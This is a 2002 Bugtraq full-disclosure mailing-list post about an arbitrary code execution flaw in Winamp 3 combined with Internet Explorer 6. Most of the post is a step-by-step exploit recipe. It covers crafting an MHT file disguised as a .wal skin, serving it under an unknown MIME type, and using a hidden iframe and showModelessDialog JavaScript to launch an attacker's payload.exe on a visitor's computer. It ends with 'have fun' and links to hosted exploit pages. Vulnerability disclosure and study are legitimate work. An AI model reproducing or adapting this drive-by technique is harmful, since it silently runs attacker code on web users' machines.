This one was missed by security focus . Lets try again -- jelmer ----- Original Message ----- From: "Jelmer" <jelmer@kuperus.xs4all.nl> To: <bugtraq@securityfocus.com> Sent: Sunday, August 11, 2002 1:28 AM Subject: newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6 > For those of you who have been living under a rock winamp 3 final was > released today > It features freeform skins, now plays video's, allows you to manage your > mp3's and a lot more > > Unfortunatly they failed to adress a pretty serious arbitrary code execution > vulnerability when combined with > Internet explorer that I reporteded to them and this list earlier concerning > winamp 2. I haven't heard from them since > > Winamp 3 uses a new skinning system that uses the .wal extention, this skin > type is also > opened automaticly in MSIE, it doesn't prompt for download and stores the > file in a known location on the users harddisk namely > > C:\Program Files\Winamp3\Skins > > (when installed in the default location like most people do) > > Working Exploit code is available at http://kuperus.xs4all.nl/winamp3.htm > > Note that this version DOES NOT use any unpatched MSIE hole to invoke the > executable and it will continue to work even after microsoft patches its > browser > As i understand it this is just the way the object tag behaves in the local > zone. (wich seems very very dangerous to me) > I also updated the winamp2 exploit code at > http://kuperus.xs4all.nl/winamp.htm > > > > Ok to encourrage winamp/aol to take their customers security a bit more > serious here's "the recipe" to how its > done. > It's kind of "http-equivesq" in length and obscurity and may not be for the > faint of heart. > > Its written from the top of my head, so please forgive me if i missed a > brace or dot here and there, here goes. > > create a directory c:\exploit > place an exe file in it, lets call it payload.exe > then create a file called exploit.htm and give it the following contents > > <html> > <body> > <img src="payload.exe"> > </body> > </html> > > open the file in internet explorer, choose file > save as, and save it as > exploit.mht > > open it in notepad and add the following line to the top <html > style="display:none;"> > > so it looks like this : > > <html style="display:none;"> > From: <Saved by Microsoft Internet Explorer 5> > Subject: > Date: Mon, 5 Aug 2002 18:30:03 +0200 > MIME-Version: 1.0 > > > Then look for the body section of this html document (it looks a little > mangled) > delete everything between the body tags and place an object tag in its > place, so it looks like this > > <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD> > <BODY> > <OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" > CODEBASE="mhtml:file:///C:/Program%20Files/winamp3/Skins/amp.wal!file:///c:/ > exploit/payload.exe"></OBJECT> > </BODY></HTML> > > this is the code that will later be used to invoke our executable > > What we have done is we have slightly altered the mht file so that it can be > vieuwed both as html and as mht file. > files starting with an <html> tag are always seen as html files in internet > explorer. (wich can be a pain as will be descibed as followed) > > ok we are set to go, now we want to place this on the users harddisk. > We know wal files are opened automaticly by winamp3 and placed in a known > location so we'll rename our exploit.mht file to wal > > unfortunatly internet explorer disrespects mime types so by having added a > <html> tag to the mht file it tries top open it as an <html> file > the only way i found around this is to set the mime type to a value MSIE > doesn't know. I chose x-foo/x-bar > If you are using apache you can add the following to your mime.types file > > x-foo/x-bar wal > > this means that the webserver will pass this mime type along with every file > requested ending in .wal > > when we now request this file it will be opened by winamp3 and an > errormessage will follow shortly, > however at that time it is allready too late, our exploit.wal file has been > placed in > > C:\Program Files\Winamp3\Skins\exploit.wal > > now all that remains is bringing it together by making the following > sequence of events occur > > 1. download our exploit.wal > 2. wait a few seconds for it to finish downloading then call exploit.wal as > html file (the file also doubles as mht file and the object tag included in > the html portion points to itself as the codebase) > > here's the code for this > > <html> > > <body> > > Waiting for 5 seconds.. > > <!-- download our renamed mht file and place it on the users disk --> > <iframe src="amp.wal" style="display:none"></iframe> > > <script language="javascript"> > > //wait for 5 seconds > > setTimeout("ExecuteFile()",5000); > > > function ExecuteFile() { > > // open the saved wal file as html file > // oddly when called from disk it didn't open it as html file so we need to > force this behaviour by using a modeless dialog > > sHTML = 'file:///C:/Program%20Files/Winamp3/Skins/amp.wal'; > sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px; > dialogheight: 0px; status:no; unadorned:yes; help:no'; > vReturnValue = window.showModelessDialog(sHTML, '', sFeatures) > } > > </script> > > </body> > </html> > > > have fun > > -- > jelmer > > >
